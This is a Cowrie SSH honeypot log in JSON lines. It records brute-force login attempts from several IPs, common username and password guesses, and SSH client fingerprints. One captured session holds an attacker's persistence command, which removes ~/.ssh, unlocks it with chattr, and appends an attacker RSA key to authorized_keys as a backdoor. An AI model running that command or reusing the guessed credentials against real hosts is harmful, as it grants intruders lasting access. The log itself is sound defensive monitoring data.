{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:46:34.384975Z","src_ip":"49.247.35.31","session":"096b386591a1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:46:35.560014Z","src_ip":"49.247.35.31","session":"096b386591a1"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:35.860757Z","src_ip":"49.247.35.31","session":"d88c77cdfe0a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:35.861877Z","src_ip":"49.247.35.31","session":"096b386591a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39424,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e816ccdf39c","protocol":"ssh","message":"New connection: 212.227.235.229:39424 (1.2.3.4:22) [session: 2e816ccdf39c]","sensor":"my-vps","timestamp":"2025-09-08T13:46:40.320534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:46:40.321753Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:46:40.447813Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.login.success","username":"root","password":"AAA111aaa","message":"login attempt [root/AAA111aaa] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:46:40.988603Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:46:41.291750Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:46:41.292417Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:46:41.293518Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:41.419694Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:46:41.687117Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:46:41.688056Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:46:41.814234Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:41.815377Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44458,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fb5a9dcbd65","protocol":"ssh","message":"New connection: 212.227.235.229:44458 (1.2.3.4:22) [session: 8fb5a9dcbd65]","sensor":"my-vps","timestamp":"2025-09-08T13:46:41.941366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:46:41.942235Z","src_ip":"212.227.235.229","session":"8fb5a9dcbd65"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:46:42.068793Z","src_ip":"212.227.235.229","session":"8fb5a9dcbd65"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:46:42.615339Z","src_ip":"212.227.235.229","session":"8fb5a9dcbd65"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:43.745451Z","src_ip":"212.227.235.229","session":"8fb5a9dcbd65"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44474,"dst_ip":"1.2.3.4","dst_port":22,"session":"44882f057d8e","protocol":"ssh","message":"New connection: 212.227.235.229:44474 (1.2.3.4:22) [session: 44882f057d8e]","sensor":"my-vps","timestamp":"2025-09-08T13:46:43.871811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:46:43.872497Z","src_ip":"212.227.235.229","session":"44882f057d8e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:46:43.999418Z","src_ip":"212.227.235.229","session":"44882f057d8e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:46:44.549386Z","src_ip":"212.227.235.229","session":"44882f057d8e"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:44.677108Z","src_ip":"212.227.235.229","session":"2e816ccdf39c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:44.678216Z","src_ip":"212.227.235.229","session":"44882f057d8e"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":39640,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea48a13ec5ac","protocol":"ssh","message":"New connection: 134.199.174.250:39640 (1.2.3.4:22) [session: ea48a13ec5ac]","sensor":"my-vps","timestamp":"2025-09-08T13:46:50.887560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:46:50.888396Z","src_ip":"134.199.174.250","session":"ea48a13ec5ac"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:46:51.141914Z","src_ip":"134.199.174.250","session":"ea48a13ec5ac"}
{"eventid":"cowrie.login.failed","username":"backup","password":"qwerty123","message":"login attempt [backup/qwerty123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:46:51.913930Z","src_ip":"134.199.174.250","session":"ea48a13ec5ac"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:46:53.195041Z","src_ip":"134.199.174.250","session":"ea48a13ec5ac"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":44126,"dst_ip":"1.2.3.4","dst_port":22,"session":"d36dab948837","protocol":"ssh","message":"New connection: 134.199.174.250:44126 (1.2.3.4:22) [session: d36dab948837]","sensor":"my-vps","timestamp":"2025-09-08T13:47:21.080623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:47:21.133809Z","src_ip":"134.199.174.250","session":"d36dab948837"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:47:21.375914Z","src_ip":"134.199.174.250","session":"d36dab948837"}
{"eventid":"cowrie.login.failed","username":"backup","password":"1q2w3e4r","message":"login attempt [backup/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:47:22.558388Z","src_ip":"134.199.174.250","session":"d36dab948837"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:47:23.855663Z","src_ip":"134.199.174.250","session":"d36dab948837"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33128,"dst_ip":"1.2.3.4","dst_port":22,"session":"41a70c3e236d","protocol":"ssh","message":"New connection: 212.227.235.229:33128 (1.2.3.4:22) [session: 41a70c3e236d]","sensor":"my-vps","timestamp":"2025-09-08T13:47:26.752305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:47:26.753435Z","src_ip":"212.227.235.229","session":"41a70c3e236d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:47:26.854514Z","src_ip":"212.227.235.229","session":"41a70c3e236d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin1234567","message":"login attempt [admin/admin1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T13:47:27.744766Z","src_ip":"212.227.235.229","session":"41a70c3e236d"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:47:28.850090Z","src_ip":"212.227.235.229","session":"41a70c3e236d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35262,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4ef931e1717","protocol":"ssh","message":"New connection: 212.227.235.229:35262 (1.2.3.4:22) [session: e4ef931e1717]","sensor":"my-vps","timestamp":"2025-09-08T13:47:39.322930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:47:39.323772Z","src_ip":"212.227.235.229","session":"e4ef931e1717"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:47:39.559402Z","src_ip":"212.227.235.229","session":"e4ef931e1717"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"qwerty","message":"login attempt [nexus/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-08T13:47:40.515156Z","src_ip":"212.227.235.229","session":"e4ef931e1717"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:47:41.746800Z","src_ip":"212.227.235.229","session":"e4ef931e1717"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":2507,"dst_ip":"1.2.3.4","dst_port":22,"session":"4adeed648e67","protocol":"ssh","message":"New connection: 49.247.35.31:2507 (1.2.3.4:22) [session: 4adeed648e67]","sensor":"my-vps","timestamp":"2025-09-08T13:47:45.998026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:47:46.017456Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:47:46.353914Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
{"eventid":"cowrie.login.success","username":"root","password":"zz123456","message":"login attempt [root/zz123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:47:47.635497Z","src_ip":"49.247.35.31","session":"4adeed648e67"}
